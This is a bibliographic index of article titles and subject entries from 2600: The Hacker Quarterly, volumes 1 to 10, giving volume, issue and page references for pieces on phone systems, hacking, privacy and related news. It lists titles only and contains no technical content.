TAP                             4(1):4, 6(2):43
taping payphone tones           7(3):36
telco info-fishing techniques   3(10):76(L)
telco nonsense                  1(5):4, 9(3):36
telco offices                   10(2):36
telco reneging                  2(10):65
telco--fighting back            1(8):46
telco--assisting wiretaps       2(1):1
tele-harassment                 3(2):10
Telecom                         6(3):12, 3(8):58
Telecom debit cards             4(1):8
teleconferencing                2(5):26
teleconferencing--anticdotes    1(4):4
telemail--access                1(4):2
Telenet                         3(6):47, 2(9):61, 4(6):9, 4(5):10, 3(11):84
                                (L), 1(2):7
telephone basics                1(8):43
telephone induction coil        7(3):36
Telstar 301                     4(11):7
TELETEL Networks                9(4):8
"Terac"                         5(1):24(L)
terminal locks                  8(3):44
test channel                    10(2):4, 8(4):45
test equipment--construction    8(2):14
test numbers                    2(11):77
Thailand                        2(6):39
Thought Police                  1(8):44, 8(4):8, 1(12):68, 7(3):16
time service                    2(4):21
TINA                            2(6):39
toll fraud detection            7(1):12, 9(3):43
tone tracer construction        8(2):14
tone catcher                    10(4):22
TOPS-10                         2(1):2
TOPS-20                         2(1):2
touch tones                     3(12):91
touch-tone fees                 4(10):6, 4(10):7, 4(2):18
trace procedures                3(1):4(L), 7(4):12
tracking devices                3(4):28(L)
trade magazines                 4(6):13(L)
transaction codes               2(12):82
Trans-Pacific Cable             2(11):79
trap tracing--defeating         7(3):22
trashing                        2(2):8, 1(2):10, 1(9):50, 3(10):73, 6(2):32
Travelnet                       1(11):61
trojan                          6(4):6, 5(2):4, 3(7):49
TRW                             2(2):9, 4(8):4, 1(7):5, 10(1):42
TSPS                            1(2):10, 2(1):4(L), 6(1):30, 1(11):62
TSPS Console                    4(6):6
TVRO                            5(1):4
UAPC                            6(3):4, 6(4):45
UK Data Protection Act          10(2):12
UK Message List                 4(9):10
UK Operator Numbers             3(8):58
Ultra Forward                   9(2):31
unassigned area codes           5(3):10
UNIX--common accounts           9(3):31
UNIX--hacking                   3(4):28(L), 3(8):57, 5(4):12, 6(3):28 (L),
                                6(4):4, 2(1):2 
UNIX--password hacker           9(1):18, 8(1):31, 8(2):24(L)
USC--Phony Degrees              2(2):9
U.S. Military Telephone 
 Network                        9(4):19
USPS                            8(3):32, 8(4):32
USSR                            2(4):21, 3(8):63, 5(4):30
UUCP                            4(9):4
VAX                             3(8):60(L), 4(5):4, 3(7):49, 2(9):57, 4(1):6
VAX--common accounts            9(3):31
VAX--worm                       6(2):38
VMS                             4(5):4
VDT                             3(3):19
VDT operators                   3(8):59
vehicle tracking monitors       1(1):3
verification                    2(9):58, 4(12):10
VFY                             4(12):10
video reviews                   10(2):40
VINs                            9(4):11
viri                            5(2):4, 5(2):8, 6(3):14, 9(3):19
virus--Atari code               8(1):4
virus--batch virus              9(1):8
virus--Gulf War                 8(4):39
virus--MSDOS (code)             9(1):4
virus "protection"              5(2):4, 9(1):9
virtual reality                 10(4):37
Virtual Memory operating System--see VMS
VM/CMS                          4(11):4, 4(12):4, 5(1):8
VM/CMS--acronyms                4(11):4
VM/CMS--filemodes               4(12:4
VM/CMS--password 
 characteristics                4(12):4
VM/CMS--privileged commands     4(12):4
voice mail hacking              6(3):36, 9(2):42
VMS                             3(3):18, 3(8):60(L), 2(9):57, 3(2):9,
                                2(10):66, 3(7):52, 4(1):6, 2(1):2
VMS--UAF                        2(10):66
VMS--common accounts            9(3):31
VMS--default passwords          3(7):52(L)
VR                              3(9):71
WATS                            5(3):23, 3(11):81, 1(9):52(L)
WATS directory                  4(1):18(L), 4(4):21(L)
Weathertrak codes               5(1):15
Weendland, Mike                 3(9):66
Western Union                   4(7):6
Western Union EasyLink          1(12):67
White House phones              1(1):5 ,10(1):12
wild claims                     6(4):30(L)
Winnipeg                        3(9):69
wire fraud news                 2(3):15
wireless modem                  4(7):13(L)
wiretaps                        1(4):3 2(6):35, 2(1):1, 7(3):30(L),
                                3(12):91, 1(11):63, 1(10):57, 2(9):58,
                                9(2):22
wiretaps--legalities            1(5):3
wiretaps--police                1(3):3
witch hunts                     7(3):10
word numbers                    4(4):15
world's most evil operator      1(7):3(L)
worms                           5(2):4
worm--Ada                       6(2):38
worm--internet                  6(3):39
WWIV BBS--hacking               9(1):12
XY Step switching station       1(5):3(L)
YIPL...see TAP
yellow pages                    3(3):23
yellow pages scam               2(5):27
Zinn, Herbert                   6(1):3, 7(1):3  

Title Index: 2600 Volume 1 - 10  
David Price

The Title Index references all articles in 2600 THE HACKER 
QUARTERLY from Volume 1 (1984) through Volume 10 (1993).  
These articles are references using the following format: 
V(N):P  Where V = Volume, N = Number, and P = Page 

EXAMPLE: 
Building a Telephone Induction Coil     7(3):36  

Thus the article in the above example is found in Volume 7, 
Number Three, on page 36. 

~   Denotes a "news" article  
(L) Denotes a letter of note

------------2600 Title Index, Vol. 1 - Vol. 10------------- 

1984 Arrives in Hong Kong~              1(1):3   
$2 Billion Error~                       2(7):43  
22013664431--Call it!                   3(3):22  
2600 A Hacking Victim~                  2(8):51  
2600 Bulletin Board Online              2(2):9  
2600 Exposes New York Tel               4(7):15  
2600 Information Bulletin               3(9):69  
2600 Information Bureau                 3(10):77  
2600 Information Bureau                 3(8):61  
2600 Information Bureau                 3(11):85  
2600 Information Bureau                 3(12):93  
2600 Writer Indicted~                   1(6):3  
411--News About Phone Companies~        8(2):35  
414 Bust~                               2(5):27  
414's Plead Guilty~                     1(4):3  
4TEL                                    6(3):20  
$6,829 Phone Bill~                      3(6):43  
617 Will be Divided~                    3(4):31  
718 Is Coming~                          1(3):3  
74,000 Calls to Fraud Line~             3(7):55  
800 Directories Now Available~          1(8):45  
800 Prefixes Listed by States           2(6):37  
818 Here to Stay~                       1(11):63  
911 Suspect Hung Up~                    1(10):57  
A 414 is Sentenced--Other Indicted~     1(5):3  
A Batch Virus                           9(1):8  
A Bittersweet Victory                   7(2):3  
A Blast From the Past                   9(4):33  
A Challenge to Hackers~                 2(1):3  
A Form of Protection For You & Your  
  Computer                              5(2):4  
A Friend in High Places                 1(9):52  
A Guide to PRIMOS                       6(2):4  
A Guide to the 5ESS                     10(2):4  
A Guide to the Israeli Phone System     2(6):33  
A Guide to VMS                          2(9):57  
A Hacker Survey                         4(8):15  
A Hacker's Guide to the TSPS Console    4(6):6  
A Hacker's Guide to UNIX                5(4):12  
A Hacking Reading List                  7(4):6  
A Look at the Future Phreaking World:  
  Cellular Telephones--How They Work    3(12):89  
A Mechanical Hacker~                    2(3):15  
A Pen Register For Phreaks?: Product  
Review--Dialed Number Recorder          4(5):22  
A Phone Phreak Scores                   2(4):19  
A Political Hacking Scandal             7(4):4  
A Reader's Reply to Captain Zap         5(2):16  
A Report on the Internet Worm           5(4):4  
A Review of "The 'Top Secret'Registry  
  of US Government Radio Frequencies"        4(11):7  
A Simple Virus in C                     9(3):19  
A Story of Eavesdropping                3(4):29  
A Study of Hackers                      10(1):38  
A Time For Reflection                   1(12):67  
A Trip to England                       3(8):58  
A True Saga of Teleconferencing         1(4):4  
A Unique Obscene Caller~                3(2):1  
A Way To Catch Peepers                  9(1):35  
A Word on Wiretapping~                  1(4):3  
Acoustic Trauma                         3(2):15  
Acronym List                            2(2):11  
Acronyms A-G                            10(1):34  
Acronyms H-R                            10(2):20  
Acronyms s-x (no y or z)                10(3):44  
ADS Investigation Moved?~               1(2):9  
AHOY!                                   1(1):1  
algorithm for credit cards correction   7(4):25  
All About BLV: Busy Line Verification   4(12):10  
Allnet's Legal Problems                 5(2):2  
Allnet: A Horror Story                  4(6):4  
Alternate Long Distance                 1(3):2  
American Network Fears Hackers~         3(5):39  
An Algorithm for Credit Cards           7(3):42  
An American Express Phone Story         3(3):17  
An Appeal For Help                      8(4):36  
An Interesting Diversion                2(10):65  
An Interpretation of Computer Hacking   5(1):16  
An Interview with Craig Neidorf         7(2):8  
An Interview with Dorothy Denning       7(3):10  
An Interview with Hugo Cornwall:  
  British Hacker/Author                 4(2):4  
An Interview With the Chaos Computer  
  Club                                  5(4):34  
An Introduction to COCOTS               7(2):20  
An MS-DOS Virus                         9(1):4  
An Official Crackdown on Hackers~       1(7):3  
An Overview of AUTOVON and Silver Boxes 3(3):17  
An Overview of DSS1                     10(3):36  
ANALYSIS: Gulf War Printer Virus        8(4):39  
Anatomy of a rip-off                    7(4):22  
And They Call US Crooks?                2(10):65  
Another Astronomical Phone Bill~        3(1):3  
Another FBI Computer File~              1(11):63  
Another Hacker Story~                   1(9):51  
Another Stinger Is Stung                3(9):66  
ANSI Bomb                               10(2):44  
Are You a Phreak???                     2(3):13  
ARPANET Hopping: America's Newest  
  Past time                             1(6):1  
ARPANet Military Subnets                1(3):5  
At the Last Stroke...~                  2(4):21  
AT&T Best For Hackers~                  3(9):71  
AT&T Computer Caught Stealing~          2(6):35  
AT&T Contractual Obligations~           2(6):39  
AT&T Credit Cards Make Debut~           1(1):3  
AT&T Does it Again~                     3(1):3  
AT&T Faces Serious Money Problems~      1(9):51  
"AT&T Keeps ""800"" Data To Itself~"    2(2):9  
AT&T Limits Use of their Credit Cards~  1(6):3  
AT&T Offers E-Mail~                     2(12):87  
AT&T Put On Hold~                       2(7):47  
AT&T Selling Pay Phones~                3(7):55  
AT&T Sub Maps                           4(8):11  
AT&T to Read E-Mail~                    2(11):79  
AT&T/BOC Routing Codes                  5(1):42  
ATM's in China~                         3(8):63  
Automated Operators Coming~             3(7):55  
AUTOVON Numbers                         3(5):37  
Avoid Phones in Storms!~                2(11):79  
Bad Tenant Database~                    3(4):27  
Bank Records Aren't So Private~         1(5):3  
Banking from your Terminal--A Look  
  at PRONTO                             2(7):42  
"BASIC ""Wargames Dialer Program"       5(1):20  
BASIC Red Box Tones                     5(3):22  
BB Traffic Cop~                         3(9):67  
BB Watching VDT Operators~              3(8):59  
BB Watching Without Regulation~         2(12):83  
BBS Listing                             2(12):85  
Be Nice to Your Telco                   1(8):46  
Beginner's Guide to Minitel             9(4):8  
Beige Box Construction                  10(1):14  
Belcore's Plans for Caller ID           9(2):18  
Bell Atlantic & MCI Collaborate~        3(2):15  
Bell Credit Card Abuse Soars~           1(4):3  
Bell Didn't Invent Phone?~              2(6):35  
Bell Propaganda Films~                  2(9):63  
Bell to AT&T: Get Lost!~                1(7):3  
Bellcore Publications Go Public~        3(5):36  
Beware of Hacker Terrorists~            3(5):39  
Big Brother No longer Watching Miami~   1(8):44  
Big Computer Crime Pays~                3(6):43  
Big Deal for Little Town~               2(11):75  
BIN List                                8(2):31  
Birth of a Low Technology Hacker        8(4):16  
BITnet Topology                         2(1):6  
Blue Box Schematic                      2(10):69  
Bogota, Columbia Gets Extra Digit~      3(5):39  
Book Review Nothing New in Computer  
  Underground by M. Harry               3(6):42  
Book Review: "Automatic Teller  
  Machines III"                         4(2):21  
Book Review: "The Hacker's Handbook"    4(2):15  
Book Review: Approaching Zero           10(3):38  
Book Review: The Cuckoo's Egg           7(1):45  
Book Review: The Devouring Fungus  
  (Tales of the Computer Age)           9(2):40  
Book Review: Tune in on Telephone Calls  
  by Tom Kneitel                        5(4):45  
Book Review: Virtual Reality            10(4):37  
BOXING ON ITT                           3(5):38  
British Credit Holes                    10(2):12  
British News                            10(1):44  
British Phonebooth Wedding~             3(4):27  
British Telecom: Guilty                 6(3):12  
Build A Tone Tracer                     8(2):14  
Building a DTMF Decoder                 7(1):14  
Building a Red Box                      5(2):13  
Building a Telephone Induction Coil     7(3):36  
But How Does it Work?                   1(8):43  
Buy My Wires~                           3(12):95  
Call Rejection in Natchez~              3(9):71  
Caller ID Technologies                  10(3):12  
Caller ID: The Facts                    7(3):5   
"Call Me" Card~                         2(6):39  
Campaign Contributions On-Line~         2(10):71  
Capitol Hill Hacker~                    3(6):43  
Capturing Passwords                     4(8):10  
Car Breathalizers~                      3(4):27  
Carrier Access Codes                    6(3):42  
Carrier Choosing Time~                  2(5):27  
Cash Machines Are Popular~              3(8):63  
Canadian WATS Phonebook                 5(3):23  
Cell Site Frequencies                   4(1):10  
Cellular Dial-By-Voice~                 3(7):55  
Cellular Magic                          10(1):4  
Cellular Modem~                         3(5):35  
Cellular Phone Biopsy                   10(4):6  
Cellular Phone Fraud and Where It's  
  Headed                                4(7):4  
Cellular Phones in England              3(2):15  
Cellular Update                         5(3):8  
Central Office Operations               7(4):12  
Changing Your Grades on A High  
  School Computer                       10(3):34  
Chinese Snitch Numbers                  6(2):35  
Cipher Fun                              9(4):6  
CIS Copyrights Public Software~         3(10):75  
Citybank Money Games~                   3(6):43  
Cityphone Has the Answer~               2(12):83  
Class Features                          8(4):31  
CLASS: What It Means To Us              4(5):6  
CNA Numbers                             4(4):10  
CNAs                                    2(3):18  
COCOT Corner                            8(4):33  
COCOT Numbers                           8(3):22  
Columnist Attacks AT&T~                 2(11):75  
Commentary: The Threat to Us All        2(8):50  
Competition...It's the next best  
thing to being there                    6(3):3  
Computel Does Exist~                    2(3):15  
Computel Put to Sleep                   4(4):4  
Computer Clothing                       3(9):71  
Computer College                        3(11):87  
Computer Crime Resources Guide          3(6):46  
Computer Crime Review                   3(6):41  
Computer Elections Examined~            2(10):67  
Computer Foul-ups Hurt Social Security~ 1(11):63  
Computer Grammar~                       3(5):35  
Computer Makes it Easy for Reagan~      1(12):69  
Computer Password Kept Secret           3(3):19  
Computer Security at the Bureau of  
  Prisons                               8(4):5  
Computer Threat Causes Chaos in Albany~ 1(6):3  
Computers Monitor Truckers~             2(7):43  
Computers Seized as Summer Games Begin~ 1(8):45  
Computers Strike Again!~                3(7):51  
Computers Threaten Privacy~             3(12):91  
Congress Chooses AT&T~                  3(4):31  
Congress Takes a Holiday                10(3):4  
Congressional Computer~                 3(5):35  
Converting a Tone Dialer into a Red Box 7(3):32  
Count of Exchanges per Area Code        3(8):62  
Country Codes                           1(2):10  
Country Codes                           3(7):53  
"Crackers" Cracked~                     2(5):27  
Crosstalk Saves Old Lady~               3(9):67  
Crypt() Source Code                     8(4):11  
Data Network Identification Codes       7(1):40  
Death of a Pay Phone                    3(10):73  
Death of NYNEX Business Centers         8(2):11  
Death Star Cards Spell Woe~             1(2):9  
"Debugging" Phones~                     3(8):63  
Decrypting Password Security            4(9):14  
Defeating Callback Verification         9(3):9  
Defeating Trap Tracing                  7(3):22  
Defense Data Network Listing            1(5):4  
Descrambling Cable                      10(1):16  
"Dial ""00"" For Operator~"             3(4):31  
Dial Back Security                      3(2):10  
Dial the Yellow Pages~                  3(3):23  
Dial-a-Directory~                       2(5):27  
Dial-A-Porn Update~                     3(1):3  
Dial-it Sex Numbers Argued~             2(11):75  
Dick Tracey Toys Are Closing In~        2(9):63  
Did You Know?                           4(7):17  
Digital Locks                           10(4):38  
Directory Assistance By Computer~       2(9):63  
Directory Assistance Failure~           3(4):31  
Dreams of GEnie~                        2(12):87  
E-COM is Going Away~                    1(6):3  
E-COM Number List                       1(6):5  
E-COM Really on the Way~                2(7):47  
"Ed Quinn Cell Site"~                   3(6):47  
E-Mail Horror Stories                   1(12):68  
E-Mail Listings                         1(12):71  
Electronic Jail All Screwed UP~         1(12):69  
Electronic Switching Advantages         1(6):2  
Electronic Tax Returns Are Here         3(2):15  
Electronic Tax Returns~                 3(10):79  
Electronics Create Portable Prisons~    1(4):2  
Elementary Switching                    10(4):9  
Encryption Provides Signature~          3(4):31  
England's Mass Announcements            4(9):10  
Equal Access 800 Drawbacks~             3(4):31  
Equal Access May Not be "Equal"  
  to Modems                             2(11):74  
ESS Goes To Taiwan                      3(10):79  
ESS: Orwell's Prophecy                  1(2):8  
Europe Standardizing Telecoms~          2(9):63  
Ever Wonder Who Owns All Those  
  800 Numbers?                          6(1):12  
Ex-Fed Tapped                           3(7):51  
Exchange List: 201 Area Code            6(2):20  
Exploits in Operator Hell               3(5):33  
Exploring Caves in Travelnet            1(11):61  
Facts and Rumors                        7(3):44  
Fascinating fone fun                    9(1):45  
Fascist Computer Network~               2(1):3  
Fawcett Phone Bill Too Big~             2(12):83  
FAX: A New Hobby                        4(5):14  
FBI Actions Anger Parents               3(11):83  
FBI Goes After ADS Hackers              1(1):2  
FBI Investigates Coffee Machine~        3(10):75  
FBI Revealed: Reviews--The FBI Project  
  Newsletter & The FBI and Your BBS     4(8):9  
FBI Shopping List~                      3(9):67  
FCC Actions~                            1(6):3  
FCC Gives Away "Resource"               3(9):71  
Federal Employees "Tracked"~            3(7):51  
Federal Express Offers "E-Mail"~        1(8):45  
Federal Phone Failures~                 3(7):55  
Federal Telephone System Upgrade~       1(12):69  
Feedback                                9(4):26  
Fiber-Optic Network For Du Pont~        2(10):71  
Final Words on VMS                      3(3):18  
Fingerprint Identification System~      3(12):95  
First of the "Superminin"~              1(12):69  
Five Aliens Hung Up~                    3(1):3  
Five Arrested in Phone Fraud~           1(7):7  
FM Telephone Transmitter                8(4):45  
FM Wireless Transmitter                 8(4):44  
For Your Protection                     7(1):3  
Fraud Alert                             7(4):43  
Free Directories For Bigwigs~           3(12):95  
Free Information in Trouble~            1(4):3  
Free Kiddie Dial-It Calls~              2(11):79  
Free Pay-Phones Plague New Jersey~      3(5):39  
French Phones Renumbered~               2(12):83  
From Sherwood Forest: Intro to Hacking  2(6):40  
From the 2600 Files                     5(1):22  
Fun and Games at a 2600 Meeting         7(1):38  
Fun Phone Numbers                       5(2):44  
Fun Things to Know                      9(2):19  
Fun With COSMOS                         2(12):82  
Fun With Fortress Fones                 1(11):62  
Gee...GTE Telcos                        6(3):33  
GEISCO's New Toy~                       2(1):3  
General Information                     6(1):7  
German Phone System Stagnant~           2(12):87  
Getting Caught: Hacker's View           1(10):55  
Getting In The Back Door: A Guide to  
  Some Popular Operating Systems        2(1):2  
Getting Started                         9(3):42  
Getting the Most Out of Equal Access    4(3):6  
Getting Your File...                    10(1):42  
Goings On                               4(4):16  
Good Apples for the Soviets~            2(4):21  
Government Bulletin Boards              10(2):39  
Government Phone Fate?~                 3(8):63  
"Grade ""A"" Hacking"                   6(3):4  
Growth of a Low Tech Hacker             9(4):17  
GTE Hit by Divestiture~                 2(1):3  
GTE Now Bigger than AT&T~               2(7):47  
GTE Raids Still Have Many Unanswered  
  Questions~                            1(1):3  
GTE Sprint Cheats Customers~            2(7):43  
GTE Sprint Overbills~                   3(9):71  
Hacker Extortionist Caught~             2(9):59  
Hacker News~                            8(2):12  
Hacker Zaps Computer Marquee~           3(3):19  
Hackers Degree?~                        3(7):51  
Hackers Go Free~                        2(4):21  
Hackers Have Big Business Scared~       2(10):71  
Hackers In Jail                         6(1):3  
Hackers in Jail, Part Two               10(4):4  
Hackers in the World of Malls: Secret  
  Service Behind Harassment of 2600  
  Meetings                              9(4):4  
Hackers on Shortwave~                   3(9):67  
Hacking AmiExpress                      9(3):4  
Hacking at the End of The Universe      10(3):4  
Hacking Computer Shows                  10(4):16  
Hacking IBM's VM/CMS                    4(11):4  
Hacking IBM's VM/CMS--Part Two          4(12):4  
Hacking MCIMAX                          8(2):16  
Hacking on Telenet: It's as Easy  
  as 123456!                            1(2):7  
Hacking on the Front Line               9(3):31  
Hacking Packard                         2(3):20  
Hacking PC Pursuit                      4(4):6  
Hacking Smartphone                      10(4):11  
Hacking WWIV                            9(1):12  
Hands Across Telenet~                   3(6):47  
Happenings                              5(1):37  
Hardwiring Your Way In                  5(4):42  
HBO Encryption Broken~                  3(10):75  
Here They Are                           9(2):24  
Here We Go Again                        9(2):22  
Here's the Secret!                      2(11):73  
High School Hacking                     10(2):13  
High School Mac Hack                    10(4):15  
High Tech Happenings                    9(4):19  
High Tech Parking Meters~~              3(5):35  
History of British Phreaking            1(9):49  
Hitchhiker Guide to the Phone System  
  Phreaking in the Nineties             9(2):10  
Home Computer Attacks Falwell~          3(1):3  
House: Hacking is Bad~                  1(8):45  
How Can Sysops Protect Themselves?      2(8):55  
How Cellular Phones Came About and What  
  You Can Expect                        3(11):90  
How Not to be Rejected~                 3(12):91  
How Payphones Really Work               6(1):30  
How Phone Phreaks are Caught            4(7):6  
How the Defeat *69                      9(2):31  
How to Build a Silver Box               6(4):20  
How to Get into a C.O.                  2(3):14  
How to Hack A Pick                      3(6):42  
How to Hack Honesty                     10(3):20  
How to Hear Phone Calls                 5(4):19  
How to Run a Successful Teleconference  2(5):26  
How to Take Apart A Payphone            9(1):20  
How to Use Your Silver Box              9(1):16  
Human Database Centers                  8(4):46  
I.R.S. Computers Screw Up~              2(3):15  
IBM ADS Directory                       1(9):53  
IBM Braille Compatible~                 3(12):95  
IBM Gets Bigger/Goodbye SBS~            2(7):47  
IBM's Audio Distribution Systems Sure  
  Can Be Fun!                           1(5):2  
IC and CIC Listing                      1(11):65  
Ice Cream Chain Aides Selective Service~1(8):45  
ICN--More than a Bargain                3(11):81  
Important News~                         4(12):3  
In Pursuit of Knowledge: An Atari 520ST  
  Virus                                 8(1):4  
Indian Phones Under Siege~              3(9):67  
"Indiana ""Fones"" Are Gone"            3(10):75  
Indiana Telco Threatens AT&T~           3(7):55  
Industrial Espionage Seminar~           2(3):15  
Infrared Beeper Will Find You           3(2):15  
Inmates Handle Information Calls~       2(12):83  
Inspect Implementation                  8(2):18  
Intelpost an Astronomical Failure~      1(5):3  
Interesting Things to do on a DEC-20    2(7):41  
International Hacking~                  3(12):91  
International NUA's                     4(10):10  
Internet Outdials                       8(1):40  
Introducing the Clear Box!              1(7):4  
IRS Drives Telco to Drink~              2(6):35  
IRS Wants Access to Telco Data~         2(1):3  
Is AT&T Hiding Near You?                9(4):36  
It Could Happen to You!                 3(2):10  
ITT Crackdown~                          2(7):43  
ITT Wiping Out Fee~                     1(8):45  
Jersey Wins Wiretap Race Again~         2(6):35  
Kenya Pay Phones Prove Popular~         2(3):15  
Kiev Calling Clogged~                   3(6):47  
Know Your Switch                        10(4):10  
Knowing UNIX                            3(8):57  
L.A. Law                                9(1):7  
Lair of the INTERNET Worm               6(3):39  
Lawsuit Filed Against Secret Service    10(1):43  
LD Companies Strike Back~               3(8):59  
Leaked Documents                        7(4):16  
Leave Our Poles Alone!~                 3(8):59  
Let's Move to France!~                  3(6):47  
Letter From Prison                      9(4):13  
Listening In                            7(1):19  
Listening In On Cellular Phones~        2(7):43  
Listening In: Catch Me if you Can!      4(11):7  
Local Toll-Free Numbers~                3(10):79  
Long Distance Option Timtable~          1(5):3  
Look Out For Sidney~                    1(7):3  
"Look Out, He's Got A Computer!"        1(7):1  
Looking for Simplex Locks?              9(1):38  
Looking Up IBM Passwords                8(1):36  
Loophole in Wiretap Law                 3(12):91  
Loopholes Around Wiretap Laws~          1(10):57  
Magnetic Strips                         8(2):7  
Man Worries About Sprint Bill~          3(4):27  
Marcos Phones For Free~                 3(4):27  
Mastering the Networks                  3(11):82  
MCI Access Numbers & Mail Numbers       1(4):5  
MCI Expanding With Optical Fibers~      2(7):47  
MCI Goes to U.K.~                       2(5):27  
MCI Mail & Western Union EasyLink       1(12):67  
MCI Mail: The Adventure Continues       1(7):2  
MCI: The Phone Company With A Lot of  
  Explaining To Do                      5(4):10  
Meeting Advice                          10(2):16  
Meeting Advice                          10(2):17  
Meeting Mania                           10(3):18  
Messages on the Move~                   3(9):71  
MILNET TAC Dialups by Location          2(7):45  
Missing Children's Faces Displayed~     2(7):43  
Mobile Frequencies                      8(4):18  
Mobile Phones--Theory and Construction  3(4):26  
Monitoring Phone Calls With A TVRO      5(1):4  
More Banks Link Arms~                   3(11):87  
More Cellular Fun                       10(3):42  
More Conversion Tricks                  8(3):43  
More Divestiture Woes~                  2(10):71  
More Hacking on Primos                  6(4):14  
More Info on VMS                        2(10):66  
More Long Distance Unpleasantries       4(12):20  
More Magic Buttons~                     3(11):87  
More Meeting Advice                     10(4):35  
More On Hacking UNIX                    6(4):4     
More on Trashing: What to Look for,  
  How to Act, Where to Go               1(9):50  
More PC Jr's., Less Z-100's for Soviets~1(8):45  
More Phone Fraud~                       2(7):43  
More Telenet Addresses                  4(6):9  
More Use of Phone Computers~            2(10):71  
More VAX Tricks                         4(5):4  
Moving Satellites Right Up In the Blue 
  ...What Was Really Going On?          2(8):52  
Mystery Transistor~                     2(5):27  
Navigate With a CD~                     3(12):95  
Navy Calls Dial-A-Porn~                 2(10):67  
Navy Phone Phreaks Nabbed~              2(10):67  
Navy Software Available~                3(10):75  
Nazi BBS a Challenge to Hackers         2(3):13  
Negative Feedback                       7(2):11  
Net Addresses                           2(4):23  
Network 2000 Saga Continues             7(3):8  
Never Erase the Past                    10(3):19  
New British Phone Service~              3(7):55  
New Chip Helps Sprint~                  3(8):63  
New Developments                        4(2):18  
New Jersey Tops Taps~                   3(7):51  
New Payphone Service for Michigan~      3(11):87  
New Payphones Confuse Callers~          3(1):7  
New Phone System for Courthouse~        2(8):51  
New Revelations From Bell South         7(3):16  
New Tracking Device For Cars~           2(6):39  
New VAX Announced~                      3(1):7  
New Ways of Stealing Data~              3(3):19  
New York's Computer Law~                3(6):43  
New York's IMAS                         4(10):4  
News Roundup~                           10(4):42  
News Update ~                           10(2):45  
News Update~                            7(2):38  
News Update~                            7(1):23  
News~                                   6(3):14  
Nickname Listings In Small Town~        3(11):87  
No Data Protection for Hong Kong~       3(7):55  
No Dial-it Calls For Feds~              2(11):75  
No Hacking While Flying, Please~        1(2):9  
No More Free Info~                      1(6):3  
No More Redialing?~                     2(12):83  
North Carolina #1 in Hacking            3(12):91  
Northern To Destroy COs                 3(3):23  
NPA Countdown                           6(4):44  
NSA Chooses AT&T Computer~              2(7):47  
NSA Doesn't Feel Secure~                1(9):51  
NSA Drops DES~                          3(9):67  
NSA Memo                                5(3):20  
NSA Wants a New Chip                    3(10):79  
NSA Wants Better Phones~                1(10):57  
Numbers                                 3(2):13  
Numbers of Interest                     4(8):6  
Numbers...Long Since Changed            3(6):45  
Nynex Bumps Southwestern Bell~          3(6):47  
NYNEX Data                              6(4):9  
Nynex Voice Mail                        10(4):18  
Oh No, Not Again!~                      1(10):57  
On The Road Again: Portable Hacking     9(2):4  
One Angry Judge                         10(1):23  
One We Somehow Missed~                  1(11):63  
Operating With Difficulty               4(9):6  
Our Contest Winners                     7(4):32  
Our Ever-Changing World~                6(4):6  
Our Wishes For '86 and Beyond           2(12):81  
Out of the Inner Circle--A Review       2(6):34  
Outdials                                8(2):44  
Outside Loop Distribution Plant, or  
  Hands-On Experience                   5(3):4  
Overcharge Hunters Needed               3(1):3  
Overseas Pirates~                       2(4):21  
Pacific Cable Planned~                  2(11):79  
Paging For Free                         4(6):5  
Passageways to the Internet             10(4):32  
Patients May Get to Keep Phones~        3(5):39  
Pay Phone Causes Panic~                 3(2):11  
Pay Telephones Deregulated~             1(7):3  
PC Pictures~                            3(12):95  
Penetrating the Pentagon by Phone~      1(12):69  
Pennant Ties Up Phones                  3(10):75  
People Express to be Hacked to Pieces   2(5):25  
Pest Control~                           2(9):63  
Phone Booth Captures Man~               2(10):67  
Phone Booth Wins Again~                 3(1):3  
Phone Booths Mauled The Stolen~         3(8):59  
Phone Fraud in Governor's House~        3(8):59  
Phone Numbers Supplied by Readers       8(1):17  
Phone Phreak Fined~                     3(4):27  
Phone Service Via Radio Shack~          3(1):3  
Phone-in Registration for College~      2(9):59  
Phones                                  4(1):20  
Phones at High and Low Speeds~          2(12):87  
Phones in the Sky~                      1(11):63  
Phoning Home From Europe                4(5):9  
Phreak Roundups~                        2(2):9  
Phreaks Tie Up Lines~                   3(12):91  
Pitcairn Island Now On AT&T Net~        2(9):59  
Police Dept. Wants Cellular Phones~     2(11):79  
Police Hacker Cleared~                  2(5):27  
Poor Connection Starts Bomb Scare~      3(9):67  
Poor Service An Understatement~         3(10):79  
Porno Phone Service Busted~             2(6):35  
Portable VAXes!!!                       3(9):71  
PRIMOS: The Final Part                  7(2):14  
Prisoner Update                         8(2):46  
Prisoners Break Law~                    3(7):51  
Private Directories Soon to be  
  Available~                            1(9):51  
Private Sector Returning                3(1):1  
Private Sector Update~                  2(9):59  
Problems for New Pay Phones~            2(6):39  
Product Review: Do It Yourself Demon  
  Dialer Kit (Hack-Tic Technologies)    9(2):15  
Product Review: Speech Thing            9(4):45  
Product Review: TDD-8 DTMF Decoder      10(2):14  
Programs in BASIC                       3(1):5  
Protecting Your SSN                     8(3):18  
Psychology in the Hacker World          8(3):38  
Public Phone Secrecy~                   3(6):43  
Punching Pay Phones                     6(3):37  
Pure Cyberfiction, Says Mitnick         8(2):42  
Pursuit For People                      2(9):58  
Q & A                                   1(2):10  
"Q" and "Z" Controversy Rages~          3(11):83  
RCI & DMS-100 Bugs                      3(9):65  
Reach Out and Touch a Nuclear Weapons  
  Contractor                            4(3):2  
Reaching Out On Your Own                2(9):58  
Reagan Hangs Up on Kids~                2(5):27  
Real Important Frequencies              9(1):17  
Real Life War Games?~                   2(4):21  
Redemption for a Hacker~                2(3):15  
Remember....                            6(2):3  
REMOBS                                  6(3):32  
Reporters Steal Swiss Phones~           3(2):11  
Review: CO Magazine                     4(9):22  
Review: Hacker: The Computer Crime  
  Card Game                             9(1):36  
Review: Sneakers                        9(3):17  
Review: The Hacker Crackdown            9(3)21  
Reviews: The 1989 Pirate Directory      6(2):42  
Ripoffs & Scams~                        6(1):36  
Robot Kills Man~                        2(4):21  
ROLM Phone System Creates a Nightmare   5(1):30  
Roman Hackers                           4(12):18  
RSTS For Beginners                      3(4):25  
RSTS: A Trick Or Two                    2(11):73  
Rural Customers Denied Access~          2(11):79  
Rural Radio Phones~                     3(8):63  
Rural Ultraphones~                      3(10):79  
'Santa Fraud'~                          2(4):21  
Satellite Jamers Jammed~                3(3):23  
Saudi Arabian BBS List                  4(7):21  
Say Goodbye to Meter Readers~           2(6):39  
SBS Offers Toll-Free Service~           1(12):69  
Scanning For Calls                      6(2):22  
Sears Satellite Network~                1(10):57  
Secret Frequencies                      8(2):32  
Secret Service on Trial                 10(1):18  
Security Can Kill Creativity            3(10):75  
Security Numbers                        1(10):59  
Security Software~                      3(1):7  
